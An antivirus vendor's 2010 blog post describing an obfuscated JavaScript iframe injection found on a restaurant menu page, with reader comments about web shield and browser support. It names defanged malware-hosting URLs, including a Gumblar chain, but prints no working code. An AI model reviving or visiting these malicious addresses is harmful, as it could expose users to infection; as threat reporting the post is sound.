Protecting over 200 million PCs, Macs, & Mobiles – more than any other antivirus

March 19th, 2010

Would you like an iframe, sir?

Yesterday, when I was about to get something to eat, my attempt to check a menu online ended up with a warning about HTML:Iframe-LZ. Well, that’s quite spicy content of common daily offer. So, let’s look what’s under the hood.

Starter: a piece of JavaScript at the end of page – served in a nicely roasted layer of obfuscation, really delicious.

delicious script

Main course: you can choose either a speciality of Chinese cuisine delivered by hxxp://b.nt002.cn/E/J.JS (it’s fortunately down already) or a Russian saschlik that contains some popular ingredients (such as google, classmates or linkhelper) in following order - hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru: 8080/ocn.ne.jp/ocn.ne.jp/ classmates.com/linkhelper.cn/google.com/ (also down already, but these two links belong to a Gumblar system).

Dessert: a nice little snippet to carry the execution of all the malcode.

cake & coffee

Anyone else hungry out there? :-)

Categories: analyses, Virus Lab Tags: , , ,
  1. March 20th, 2010 at 05:52 | #1

    Michal,

    I am always hungry to learn from you guys…

    Please teach me more…and more….

    cheers,

  2. March 20th, 2010 at 05:59 | #2

    Hi Michal,

    I don’t see that avast! block one of your referenced site like :

    hxxp://www.unmaskparasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

    When i opened it, then nothing happened with avast! which is detected at this site contains some suspicious link.

    cheers,
    yanto chiang

  3. Chocobollz
    March 20th, 2010 at 13:06 | #3

    Hi there, in one of your post (here: http://blog.avast.com/2010/02/18/ads-poisoning-–-jsprontexi/ ), there’s someone who is asking this question:

    Dawn :
    Do you need the web shield for this? I disabled that function because it worsened my surfing speed. I only use File System Shield and Behavior Shield.

    I would like to know it too, do we need to activate the webshield to detect those JS viruses or not? I ask this because I myself usually turn the webshield off because it interfering with my firewall.

    Best regards.

  4. March 21st, 2010 at 18:15 | #4

    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

  5. March 21st, 2010 at 18:22 | #5

    @Chocobollz
    This infection was caught by Web shield. I can only suggest you to turn it on, because a vast majority of malware attacks comes from internet/surfing nowadays. Some issues with slow browsing while having web shield turned on are currently discussed here http://forum.avast.com/index.php?topic=56694.0

  6. March 22nd, 2010 at 04:25 | #6

    Michal Krejdl :
    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

    Hi Michal,

    It’s okay,

    I randomly analyze your referenced link,
    Anyway, nice article to share with us…keep go forth to give contribution about security issues in IT world.

    cheers,
    yanto chiang

  7. Chocobollz
    March 22nd, 2010 at 08:14 | #7

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me, the problem is, if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) becomes ineffective, I mean, all of the connection requests made by the browser will be shown as came from the webshield, not the browser itself, so it kind of make my firewall useless as it cannot apply restrictions based on individual application. I just hope that Avast would place its scanner after a firewall, not before it. That would likely solve the problem.

  8. March 22nd, 2010 at 13:07 | #8

    Chocobollz :

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me, the problem is, if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) becomes ineffective, I mean, all of the connection requests made by the browser will be shown as came from the webshield, not the browser itself, so it kind of make my firewall useless as it cannot apply restrictions based on individual application. I just hope that Avast would place its scanner after a firewall, not before it. That would likely solve the problem.

    Hello,
    Webshield acts as HTTP proxy so all traffic going through the webshield to the internet. We recommend you to use our built in firewall in Avast Internet Security.

  9. March 28th, 2010 at 13:59 | #9

    HI
    Sorry for posting here but i have a problem i dont now how to solve.

    Iam using comodo Dragon as my default browser and when i check my Avast settings i cant see any activity in the webshield. Comodo Dragon is a very new browser but it´s similar to Google Chrome. Webshield do not scan when i am surfing the web.
    But Avast scanner is scanning my networktraffic even if i use Comodo Dragon and when i´m switch to Internet Explorer8 everything work as it should.
    I dont wont to be unprotected when i surf the web using comodo. Can you please give me an explanation?
    Sorry, i forgot to say that i am running Comodo Dragon and Avast with Windows 7 Ultimate x86
    sorry for my bad English

  10. March 29th, 2010 at 02:33 | #10

    avast megustaria que ubiera un serviosio tecnico online mas seguridad

  11. March 29th, 2010 at 12:32 | #11

    Magnus Johansson :

    HI
    Sorry for posting here but i have a problem i dont now how to solve.

    Iam using comodo Dragon as my default browser and when i check my Avast settings i cant see any activity in the webshield. Comodo Dragon is a very new browser but it´s similar to Google Chrome. Webshield do not scan when i am surfing the web.
    But Avast scanner is scanning my networktraffic even if i use Comodo Dragon and when i´m switch to Internet Explorer8 everything work as it should.
    I dont wont to be unprotected when i surf the web using comodo. Can you please give me an explanation?
    Sorry, i forgot to say that i am running Comodo Dragon and Avast with Windows 7 Ultimate x86
    sorry for my bad English

    Hello,
    please leave us a ticket on support.avast.com so we can handle your problem effectively and we can track our communication. Meanwhile I am going to test the browser.

  12. March 29th, 2010 at 13:51 | #12

    @Magnus Johansson
    Hello,
    good news Magnus
    Within next 48 hours you will receive new VPS update and Avast Webshield will scan the Comodo Dragon packets. So just keep your VPS updates running.

  13. spg SCOTT
    March 29th, 2010 at 15:32 | #13

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

  14. GW Anderson
    March 29th, 2010 at 17:26 | #14

    Thank you for today’s (29 March, 2010) blog “Why does http://www.avast.eu take me to the Avira website?…..or isn’t security built on trust?”

    I have my own problems with Avira. It is helpful to know this information in order that I may help those who truly want avast! Do not be misled. You are correct. Trust is very important.

    Thank you again.

    GWA

  15. March 29th, 2010 at 17:49 | #15

    @GW Anderson
    This domain is owned by Avira since 2006. Our official domain is avast.com.

  16. GW Anderson
    March 29th, 2010 at 18:14 | #16

    Thank you. I do not understand the RSS feed which I mentioned in the above note which came this morning.

  17. March 29th, 2010 at 20:22 | #17

    @GW Anderson
    Oh, now I can see it. I was a bit confused, because the article is not available except those RSS readers that caught it.

  18. GW Anderson
    March 29th, 2010 at 21:24 | #18

    Was the article withdrawn? When I went to the website to view the complete article, I was ‘welcomed’ to the Error 404 page.

    Thanks for responding.

  19. April 1st, 2010 at 23:24 | #20

    @Vojta – Avast support team.
    comodo still dont work with Avast 5.0. I have reinstalled Avast like you suggested and i also reinstalled Comodo. Can you solve this or i am consider uninstall Avast and try something else.
    @Scott. I modified the ini. file and it did the trick but why should i need to do that for? This bug in Avast or Comodo can´t be impossible to fix. I have been in contact with both Avast support and the Comodo support and both said the problem is solved. Is it me and my computer or what?

  20. spg SCOTT
    April 2nd, 2010 at 12:33 | #21

    @magnus johansson

    It is not necessarily a bug in either.
    As I know it there is a list of browsers that are scanned by default (e.g. IE, Fx, the other mainstream browsers) and Dragon is not currently on that list.

    I am not quite sure as to why this is but it is the way that it is done.

    The INI modification is a workaround of sorts, and adds dragon to be scanned.

    The way I see it is that Dragon is not so well known to the ALWIL devs and so they have to look into it before it gets scanned.

    It was initially also the same with Chrome, but now it is supported by default.

    -Scott-

    p.s. Glad the thread helped :)

  21. April 3rd, 2010 at 01:10 | #22

    Problem solved.
    The latest VPS update did the trick. Feels so good!
    Thanks everyone who helped me with this especially @Scott and @Vojta – Avast support team

  22. spg SCOTT
    April 3rd, 2010 at 13:50 | #23

    You’re Welcome :)

  23. April 6th, 2010 at 10:54 | #24

    spg SCOTT :

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

    Hello,
    it is already in the Avast code so there is no need to add it manually.

  24. spg SCOTT
    April 6th, 2010 at 15:26 | #25

    @Vojta – Avast support team
    Hi,

    Yes, I saw that in the thread and in Magnus Johansson’s post :D

    -Scott-

  25. spg SCOTT
    April 6th, 2010 at 15:28 | #26

    @Vojta – Avast support team
    As a side note, maybe the knowledge-base article on the subject could be updated for version 5?

  26. Mario
    April 6th, 2010 at 15:35 | #27

    Hi trend micro detected this website hxxp://www.swfcabin.com/open/1243702443 as malware and i went on the website on my home computer and i’m scared my computer is infected with the malware can you get avast home the free antivirus to detect it please im begging you im very scared and i just payed $100 dollars to have my computer fixed so please get avast! home the free antivirus version to detect the malware. so please get avast home the free antivirus to detect it

  27. April 7th, 2010 at 15:15 | #28

    @spg SCOTT
    Do you mean article about this particular browser or general note about adding the browser into the webshield?

  28. spg SCOTT
    April 8th, 2010 at 17:03 | #29

    I was thinking about this one:
    http://support.avast.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=374

    Maybe it could be updated to include the ones that are scanned in V5

    And possibly have it show how to optin one that is not scanned?

    -Scott-

  29. April 9th, 2010 at 15:47 | #30

    @spg SCOTT
    Hello Scott,
    it will be updated.

  30. spg SCOTT
    April 10th, 2010 at 20:18 | #31

    @Vojta – Avast support team

    Cool, Thanks :)

    The more knowledgebase articles we have, the better ;)

    -Scott-

  31. April 14th, 2010 at 01:59 | #32

    Please cancel my avast anti-virus and e-mail me the results in cancelling this system from my computer.

    Patti
    2YA7

  32. April 14th, 2010 at 02:02 | #33

    Please notify me of system being off my computer. There is no cancelling information and I no longer want it on my computer. E-mail me these results of no longer having avast on my computer. As soon as possible I want it off my computer, and a response from you. Send response to psasala@verizon.net
    Thank You,
    Patti Sasala

Comments are closed.